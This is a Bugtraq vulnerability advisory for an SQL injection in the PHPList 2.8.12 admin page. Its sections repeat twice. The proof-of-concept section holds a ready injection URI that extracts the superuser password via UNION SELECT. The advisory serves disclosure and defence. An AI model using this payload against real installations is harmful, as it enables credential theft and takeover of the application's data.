PHPList Admin Page SQL Injection Vulnerability
BID:14403
Info
PHPList Admin Page SQL Injection Vulnerability
| Bugtraq ID: | 14403 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 28 2005 12:00AM |
| Updated: | Jul 28 2005 12:00AM |
| Credit: | tgo <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHPList Mailing List Manager 2.8.12 |
| Not Vulnerable: | |
Discussion
PHPList Admin Page SQL Injection Vulnerability
PHPList is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
PHPList is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
PHPList Admin Page SQL Injection Vulnerability
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/public_html/lists/admin/?page=admin&id=INJECT HERE
http://www.example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/public_html/lists/admin/?page=admin&id=INJECT HERE
http://www.example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password
Solution / Fix
PHPList Admin Page SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHPList Admin Page SQL Injection Vulnerability
References:
References: